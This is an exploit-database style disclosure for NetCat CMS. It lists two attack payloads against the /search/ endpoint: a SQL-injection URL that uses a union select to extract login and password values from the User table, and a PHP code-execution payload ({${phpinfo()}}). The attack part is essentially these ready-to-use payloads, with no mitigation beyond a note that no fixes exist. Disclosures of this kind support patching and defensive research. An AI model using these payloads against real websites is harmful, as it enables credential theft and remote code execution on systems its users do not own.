NetCat CMS Multiple Vulnerabilities

2011-09-12 14:15:04

# Exploit Title: NetCat CMS Code exec, SQL-injection
# Google Dork: none
# Date: 28.11.2010
# Author: brain[pillow]
# Software Link: http://netcat.ru/
# Version: UNKNOWN

On different versions of this software next vulnerabilities are availible:

=======================================================
# Sql-injection:

/search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23

=======================================================
# Code exec:

/search/?action=index&text={${phpinfo()}}

Fixes

No fixes

In order to submit a new fix you need to be registered.